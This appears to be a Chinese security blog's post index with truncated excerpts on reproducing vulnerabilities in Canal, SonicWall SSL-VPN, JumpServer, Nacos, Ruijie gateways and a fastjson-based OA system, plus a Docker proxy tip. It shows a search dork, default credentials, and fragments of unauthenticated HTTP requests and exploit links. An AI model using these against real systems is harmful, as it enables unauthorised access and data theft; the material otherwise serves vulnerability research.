阿里巴巴Canal信息泄露漏洞 复现

"Canal" +port:"8089"  默认账号 :admin/123456 GET /api/v1/canal/config/1/0 HTTP/1.1 Host:192.168.1.71:8089 Cache-Control: max-age=0 Upgrade-Insecure...

SonicWall SSL-VPN 未授权RCE漏洞 复现

https://www.seebug.org/vuldb/ssvid-99110 https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ exp: # !/usr/bin/pyt...

docker代理配置 pull 加速

一、代理加速 这里是socket5 127.0.0.1:23333 然后burp 代理一下处理 [root@localhost ~]#mkdir -p /etc/systemd/system/docker.service.d [root@local...

jumpserver远程代码执行漏洞分析

一、获取Token 首先是找到那个修改bug 的点 https://github.com/jumpserver/jumpserver/commits/master 然后对比一下代码。 https://githistory.xyz/j...

JumpServer远程执行漏洞 复现

首先。安装 安装脚本V2.6.1 https://www.o2oxy.cn/wp-content/uploads/2021/01/quick_start.zip github 安装脚本全部是安装最新版的。 安装的时候注意几个坑。 ...

Nacos 未授权访问

用户列表size代表用户数量 GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1 Host: x.x.x.x User-Agent: Nacos-Server Connection: close ...

常用java 利用工具

https://www.o2oxy.cn/wp-content/uploads/2021/01/Java利用工具.zip

锐捷网关系列通杀GetShell

https://github.com/Tas9er/EgGateWayGetShell 使用jd-gui 解开 整理出POC 如下: POST /guest_auth/guestIsUp.php HTTP/1.1 Host: 192.168.10.1 Connection: ...

密码保护:某OA fastjson 复现

某OA 在某些低版本使用了fastjson  1.2.58  。导致了前台的一个fastjson 的Rce   User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Fi...